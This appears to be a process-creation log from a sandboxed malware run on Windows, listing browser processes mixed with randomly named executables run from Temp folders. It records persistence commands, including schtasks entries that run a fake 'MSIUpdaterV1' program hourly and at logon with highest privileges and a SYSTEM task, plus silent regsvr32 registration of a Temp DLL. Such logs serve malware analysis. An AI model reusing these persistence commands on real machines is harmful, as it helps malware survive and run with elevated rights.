"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffc82e646f8,0x7ffc82e64708,0x7ffc82e64718

C:\Users\Admin\AppData\Local\Temp\heidip5qbJ3INLYaz\hGnIVTJbniiugaulndqv.exe

"C:\Users\Admin\AppData\Local\Temp\heidip5qbJ3INLYaz\hGnIVTJbniiugaulndqv.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc82e646f8,0x7ffc82e64708,0x7ffc82e64718

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV1\MSIUpdaterV1.exe" /tn "MSIUpdaterV1 HR" /sc HOURLY /rl HIGHEST

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2264,17364547049839875453,10625535688629497048,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2848 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffc82e646f8,0x7ffc82e64708,0x7ffc82e64718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2264,17364547049839875453,10625535688629497048,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2264,17364547049839875453,10625535688629497048,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2276 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.youtube.com

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,17364547049839875453,10625535688629497048,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.facebook.com/video

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://accounts.google.com

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,17364547049839875453,10625535688629497048,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xfc,0x10c,0x7ffc82e646f8,0x7ffc82e64708,0x7ffc82e64718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffc82e646f8,0x7ffc82e64708,0x7ffc82e64718

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.facebook.com/video

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc6f829758,0x7ffc6f829768,0x7ffc6f829778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc6f829758,0x7ffc6f829768,0x7ffc6f829778

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV1\MSIUpdaterV1.exe" /tn "MSIUpdaterV1 LG" /sc ONLOGON /rl HIGHEST

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,17364547049839875453,10625535688629497048,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4208 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,17364547049839875453,10625535688629497048,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4528 /prefetch:1

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,17364547049839875453,10625535688629497048,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4408 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,17364547049839875453,10625535688629497048,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1524,2525749010093275192,12174032622444560376,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xfc,0x10c,0x7ffc6f829758,0x7ffc6f829768,0x7ffc6f829778

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" https://accounts.google.com

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,17364547049839875453,10625535688629497048,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4028 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,10262843961557492095,15357762294570849128,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 /prefetch:3

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,17364547049839875453,10625535688629497048,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4980 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,17364547049839875453,10625535688629497048,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5640 /prefetch:1

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,17364547049839875453,10625535688629497048,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5992 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,17364547049839875453,10625535688629497048,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,17364547049839875453,10625535688629497048,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6020 /prefetch:1

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6516.0.362609268\2099137141" -parentBuildID 20221007134813 -prefsHandle 1868 -prefMapHandle 1860 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a6e4828f-f9bb-4a81-8eb7-010578d8f589} 6516 "\\.\pipe\gecko-crash-server-pipe.6516" 1960 1b8b79eb758 gpu

C:\Users\Admin\AppData\Local\Temp\heidi6DbP_N64XGcl\Gt_q28K1Pij1MddE1Ptw.exe

"C:\Users\Admin\AppData\Local\Temp\heidi6DbP_N64XGcl\Gt_q28K1Pij1MddE1Ptw.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6516.1.1762859660\896436887" -parentBuildID 20221007134813 -prefsHandle 2416 -prefMapHandle 2412 -prefsLen 21565 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2cde6dca-4aa1-4228-b1f3-192c8fc69211} 6516 "\\.\pipe\gecko-crash-server-pipe.6516" 2452 1b8b7140b58 socket

C:\Users\Admin\AppData\Local\Temp\FF5.exe

C:\Users\Admin\AppData\Local\Temp\FF5.exe

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6516.2.1389827356\513907467" -childID 1 -isForBrowser -prefsHandle 3008 -prefMapHandle 1324 -prefsLen 21668 -prefMapSize 233444 -jsInitHandle 1052 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d50720fd-0bff-4811-a940-289057a83064} 6516 "\\.\pipe\gecko-crash-server-pipe.6516" 2964 1b8bb5ead58 tab

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2232 --field-trial-handle=1996,i,10485460941861558138,4091259679817495077,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1928 --field-trial-handle=1996,i,10485460941861558138,4091259679817495077,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1644 --field-trial-handle=1996,i,10485460941861558138,4091259679817495077,131072 /prefetch:2

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6516.3.571719448\226535996" -childID 2 -isForBrowser -prefsHandle 3544 -prefMapHandle 3540 -prefsLen 26066 -prefMapSize 233444 -jsInitHandle 1052 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cc0a1d06-a136-4fff-b8c3-c9b93cb0c836} 6516 "\\.\pipe\gecko-crash-server-pipe.6516" 3552 1b8aad61958 tab

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3144 --field-trial-handle=1996,i,10485460941861558138,4091259679817495077,131072 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\heidip5qbJ3INLYaz\GCWEHT8K4v5SdsJZFtFi.exe

"C:\Users\Admin\AppData\Local\Temp\heidip5qbJ3INLYaz\GCWEHT8K4v5SdsJZFtFi.exe"

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4060 --field-trial-handle=1996,i,10485460941861558138,4091259679817495077,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=2992 --field-trial-handle=1996,i,10485460941861558138,4091259679817495077,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1956 --field-trial-handle=2024,i,5557749574225615445,7883934478427062869,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1668 --field-trial-handle=2004,i,2302472976579425981,17844444468222244877,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5040 --field-trial-handle=1996,i,10485460941861558138,4091259679817495077,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=2004,i,2302472976579425981,17844444468222244877,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3624 --field-trial-handle=1996,i,10485460941861558138,4091259679817495077,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1812 --field-trial-handle=2024,i,5557749574225615445,7883934478427062869,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4528 --field-trial-handle=1996,i,10485460941861558138,4091259679817495077,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3120 --field-trial-handle=1996,i,10485460941861558138,4091259679817495077,131072 /prefetch:1

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6516.5.100219316\362446075" -childID 4 -isForBrowser -prefsHandle 5080 -prefMapHandle 5076 -prefsLen 26206 -prefMapSize 233444 -jsInitHandle 1052 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cc981a1e-d3d0-42d0-aefc-68d5a07a27b4} 6516 "\\.\pipe\gecko-crash-server-pipe.6516" 5012 1b8bdbbc758 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6516.4.134982506\89800635" -childID 3 -isForBrowser -prefsHandle 4856 -prefMapHandle 4852 -prefsLen 26206 -prefMapSize 233444 -jsInitHandle 1052 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {23bcb338-f14e-4c48-94b9-94b81ed53430} 6516 "\\.\pipe\gecko-crash-server-pipe.6516" 4868 1b8aad66858 tab

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gloyEKczR"

C:\Users\Admin\AppData\Local\Temp\heidip5qbJ3INLYaz\V1FkYflsSuINyVwTTmob.exe

"C:\Users\Admin\AppData\Local\Temp\heidip5qbJ3INLYaz\V1FkYflsSuINyVwTTmob.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bokvhhUgtHQNbUrNPU" /SC once /ST 17:10:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\fvLIfGGBBdNYLYAis\gCckOLUAyUDZmqr\FwvfrvJ.exe\" r1 /PXsite_idcxh 525403 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\3EA7.exe

C:\Users\Admin\AppData\Local\Temp\3EA7.exe

C:\Users\Admin\AppData\Local\Temp\is-D1NJE.tmp\3EA7.tmp

"C:\Users\Admin\AppData\Local\Temp\is-D1NJE.tmp\3EA7.tmp" /SL5="$50372,4061719,54272,C:\Users\Admin\AppData\Local\Temp\3EA7.exe"

C:\Users\Admin\AppData\Local\Info Tool Extension\infotoolext.exe

"C:\Users\Admin\AppData\Local\Info Tool Extension\infotoolext.exe" -i

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=4488 --field-trial-handle=1996,i,10485460941861558138,4091259679817495077,131072 /prefetch:1

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\489B.dll

C:\Users\Admin\AppData\Local\Info Tool Extension\infotoolext.exe

"C:\Users\Admin\AppData\Local\Info Tool Extension\infotoolext.exe" -s

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\489B.dll

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6516.8.548551733\852648684" -childID 7 -isForBrowser -prefsHandle 5280 -prefMapHandle 5504 -prefsLen 26381 -prefMapSize 233444 -jsInitHandle 1052 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fc3f0be8-1d6b-42f1-a229-8bf7ccaabd4b} 6516 "\\.\pipe\gecko-crash-server-pipe.6516" 5508 1b8be35f458 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6516.7.11885308\1485962313" -childID 6 -isForBrowser -prefsHandle 2884 -prefMapHandle 3384 -prefsLen 26381 -prefMapSize 233444 -jsInitHandle 1052 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4e2693e2-3ea0-431c-9a9a-23343d9971dc} 6516 "\\.\pipe\gecko-crash-server-pipe.6516" 5280 1b8be360f58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6516.6.1702852335\1337804002" -childID 5 -isForBrowser -prefsHandle 4668 -prefMapHandle 5272 -prefsLen 26381 -prefMapSize 233444 -jsInitHandle 1052 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {342d548a-ad4b-4791-9a34-c178dcae7059} 6516 "\\.\pipe\gecko-crash-server-pipe.6516" 3436 1b8be35f158 tab

C:\Users\Admin\Documents\GuardFox\TKKw1hmTwVBMTsgOoU3BCklJ.exe

"C:\Users\Admin\Documents\GuardFox\TKKw1hmTwVBMTsgOoU3BCklJ.exe"

C:\Users\Admin\Documents\GuardFox\ahAzs7ebC94TtCXZ451KXqOC.exe

"C:\Users\Admin\Documents\GuardFox\ahAzs7ebC94TtCXZ451KXqOC.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
